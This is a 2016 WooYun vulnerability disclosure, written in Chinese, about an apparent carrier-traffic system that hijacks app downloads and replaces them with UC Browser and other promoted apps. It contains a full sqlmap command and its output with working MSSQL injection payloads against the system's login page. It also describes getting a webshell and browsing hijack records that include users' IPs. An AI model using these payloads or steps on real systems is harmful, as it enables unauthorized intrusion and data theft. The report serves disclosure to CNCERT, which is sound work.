当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168329

漏洞标题:疑似某基于运营商流量的APK劫持推广系统存漏洞(每天高达百万计的劫持数据统计)

相关厂商:某地运营商

漏洞作者: 路人甲

提交时间:2016-01-08 13:52

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开

简要描述:

事件起源是群里有唐山的兄弟说自己下载小米商店应用,无论是手机端还是 PC 端,下载到本地都会变成了 『UCBrowserV10.9.0.703androidpf145bi800_(Build151211143335).apk』-- UC 浏览器。
在抓包过程中竟然发现了一套管理系统,所以我们就嘿嘿嘿

详细说明:

下载小米商店突变成 UC 浏览器,如图:

14521577283171.jpg


在抓包测试过程中发现了 UC 浏览器的下载链接为:

**.**.**.**:81/Handler.ashx?ID=tangshan&u=aHR0cDovL2ZpbGUubWFya2V0LnhpYW9taS5jb20vZG93bmxvYWQvQXBwU3RvcmUvMGZlNzg1OGIyZTY3NDcwODI3NDdiODgxYjQzMjg4ODkxOTk0MmU2YzIvY29tLnhpYW9taS5tYXJrZXRfUi4xLjQuNS5hcGs=


u 参数为 base64 加密字符串,解密后为小米应用商店的官方下载地址:

http://**.**.**.**/download/AppStore/0fe7858b2e6747082747b881b432888919942e6c2/com.xiaomi.market_R.1.4.5.apk


测试后发现上面 UC 浏览器的下载链接无论 u 参数是什么都会下载 UC 浏览器。

curl -I "**.**.**.**:81/Handler.ashx?ID=tangshan&u=aHR0cDovL2ZpbGUubWFya2V0LnhpYW9taS5jb20vZG93bmxvYWQvQXBwU3RvcmUvMGZlNzg1OGIyZTY3NDcwODI3NDdiODgxYjQzMjg4ODkxOTk0MmU2YzIvY29tLnhpYW9taS5tYXJrZXRfUi4xLjQuNS5hcGs="
HTTP/1.1 302 Found
Date: Thu, 07 Jan 2016 09:59:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: http://**.**.**.**/down1/gongyp/kbllq7/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151231101345).apk
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 221


直接访问 **.**.**.**:81/ 是一个所谓的 『安装分发平台』,听起来像是安卓应用的分发渠道,目前看应该是这套系统搞的鬼:

14521578019217.jpg


遂对该系统进行测试,发现等登录处存在 SQL 注入漏洞,并且验证码写到 Cookie 里面就可以无限使用,直接丢到 SQLMAP 里面:

./sqlmap.py -u "**.**.**.**:81/Ajax/LoginVal.aspx?userid=admin*&pwd=111111&code=cq70" --dbms mssql --cookie "Kuaibu_Code=CQ70"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03160d9}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:28:46
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[14:28:48] [INFO] testing connection to the target URL
[14:28:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[14:28:48] [INFO] testing if the target URL is stable
[14:28:49] [INFO] target URL is stable
[14:28:49] [INFO] testing if URI parameter '#1*' is dynamic
[14:28:49] [INFO] confirming that URI parameter '#1*' is dynamic
[14:28:49] [INFO] URI parameter '#1*' is dynamic
[14:28:49] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'Microsoft SQL Server')
[14:28:49] [INFO] testing for SQL injection on URI parameter '#1*'
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] y
[14:28:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:28:56] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:28:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:28:56] [INFO] URI parameter '#1*' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[14:28:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:28:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:28:56] [WARNING] time-based comparison requires larger statistical model, please wait...............
[14:29:07] [INFO] URI parameter '#1*' seems to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
[14:29:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:29:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (comment)'
[14:29:20] [INFO] URI parameter '#1*' seems to be 'Microsoft SQL Server/Sybase time-based blind (comment)' injectable
[14:29:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:29:20] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:29:23] [WARNING] reflective value(s) found and filtering out
[14:29:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:29:26] [INFO] target URL appears to have 7 columns in query
[14:29:26] [WARNING] combined UNION/error-based SQL injection case found on column 6. sqlmap will try to find another column with better characteristics
[14:29:27] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[14:29:27] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' AND 7367=7367 AND 'XdzV'='XdzV&pwd=111111&code=cq70
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' AND 5693=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5693=5693) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113))) AND 'elKA'='elKA&pwd=111111&code=cq70
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin';WAITFOR DELAY '0:0:5'--&pwd=111111&code=cq70
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' WAITFOR DELAY '0:0:5'--&pwd=111111&code=cq70
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: **.**.**.**:81/Ajax/LoginVal.aspx?userid=admin' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(108)+CHAR(115)+CHAR(118)+CHAR(65)+CHAR(87)+CHAR(109)+CHAR(71)+CHAR(85)+CHAR(119)+CHAR(76)+CHAR(117)+CHAR(81)+CHAR(68)+CHAR(120)+CHAR(67)+CHAR(78)+CHAR(118)+CHAR(110)+CHAR(89)+CHAR(106)+CHAR(70)+CHAR(65)+CHAR(97)+CHAR(70)+CHAR(116)+CHAR(68)+CHAR(76)+CHAR(110)+CHAR(116)+CHAR(79)+CHAR(98)+CHAR(88)+CHAR(66)+CHAR(108)+CHAR(70)+CHAR(90)+CHAR(67)+CHAR(114)+CHAR(103)+CHAR(109)+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- -&pwd=111111&code=cq70
---
[14:29:53] [INFO] testing Microsoft SQL Server
[14:29:53] [INFO] confirming Microsoft SQL Server
[14:29:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[14:29:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 20 times
[14:29:54] [INFO] fetched data logged to text files under '/Users/***/.sqlmap/output/**.**.**.**'
[*] shutting down at 14:29:54


但是对注入利用获取到的管理账户密码为自定义加密,暂时放弃后台,转为 getshell,虽然不是 dba 权限,但是有某颜色老师的帮助,轻松获取到 webshell。

14521610448018.jpg


BTW:在获取权限的过程中,81 端口突然无法访问,扫描发现开放了 84 端口,跑着同样的系统,所以上图中的 webshell 为 84 端口。
对数据库结构大概浏览了下,他们把这种劫持称之为跳转,并且会把每个跳转的记录都入库,还会按照日期(每天)进行分表。

14521612414181.jpg


查询RedirectRecord_20160106表,记录的数据格式为:

ID	KeywordUrl_ID	LinkID	KeyType	LinkName	KeyName	FromUrl	FromIp	RedirectUrl	RedirectTime
1516444	21	15	其他跳转	tangshan	sss	http://**.**.**.**/myapp/gjbig/packmanage/34/2/3/105047/KingMaster_v**.**.**.**_c136_70A6099CB6CF3F97_2015-12-24_105047.apk	**.**.**.**	http://**.**.**.**/down1/gongyp/kbllq/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151211143335).apk	01/06/2016 01:25:21
1516436	21	15	其他跳转	tangshan	sss	**.**.**.**/cache/**.**.**.**/download/AppStore/0c67d41f51b7b9186d776df76eb2e0e540143b1fa/%E5%BF%AB%E6%89%8B_**.**.**.**_669.apk?ich_args=5f85a51ec0dafb877cf1588864b30d0d_1048_0_0_14_b0659a6f93f4fc260ebd987cb904216b97378fd0ed64de08c1e6a5d9b0eae411_47a8607d034746fc31acb1017a36bf83_1_0&ich_ip=39-244	**.**.**.**	http://**.**.**.**/down1/gongyp/kbllq/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151211143335).apk	01/06/2016 01:25:20


可以看到有一些关键信息:FromUrl FromIp RedirectUrl RedirectTime 来判断这条记录是 IP 为 **.**.**.** 的用户下载 **.**.**.**/cache/**.**.**.**/download/AppStore/0c67d41f51b7b9186d776df76eb2e0e540143b1fa/%E5%BF%AB%E6%89%8B_**.**.**.**_669.apk?ich_args=5f85a51ec0dafb877cf1588864b30d0d_1048_0_0_14_b0659a6f93f4fc260ebd987cb904216b97378fd0ed64de08c1e6a5d9b0eae411_47a8607d034746fc31acb1017a36bf83_1_0&ich_ip=39-244 小米商店应用,最后被跳转下载 http://**.**.**.**/down1/gongyp/kbllq/UCBrowser_V**.**.**.**_android_pf145_bi800_(Build151211143335).apk UC 浏览器。
统计了下每个表中的记录数为:

时间			劫持数量
20151228		642857
20151229		792764
20151230		829208
20151231		974141
20160101		968162
20160102		802980
20160103		751637
20160104		893009
20160105		1200640
20160106		1516445
20160107		972950


劫持的数据每天高达百万,如果这么做的话,随便一款 APP 装机量都挺恐怖的。
通过 webshell,我们解密加密后的密码登陆到后台,后台功能比较简单:

14521623885735.jpg


看页面显示有 tianjin tangshan sichuan,感觉应该是地区拼音,还记得我们前面说的那位唐山兄弟吗?难道是只对这些地区的 IP 进行劫持?我们从数据库中抽查部分数据,能够印证我们的推测。
对 tangshan 的这条数据进行管理跳转操作,有如下内容:

14521628445489.jpg


14521626758833.jpg


14521626863151.jpg


看来除了 UC 浏览器还有别家通过这套劫持系统对自家的应用做推广。比如百度手机卫士、360 安全卫士、爱奇艺等。
PS:还发现一个比较奇怪的事情,就是被劫持的链接本身就是自己的应用,最后又被劫持为自家的应用。难道是这个平台为了骗厂家劫持量?

漏洞证明:

证明参加漏洞详细说明。

修复方案:

我不懂怎么修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-12 17:00

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT向中国电信集团公司、中国移动集团公司、中国联合网络通信集团有限公司通报,根据反馈情况,已经由中国电信进行后续处置。

最新状态:

暂无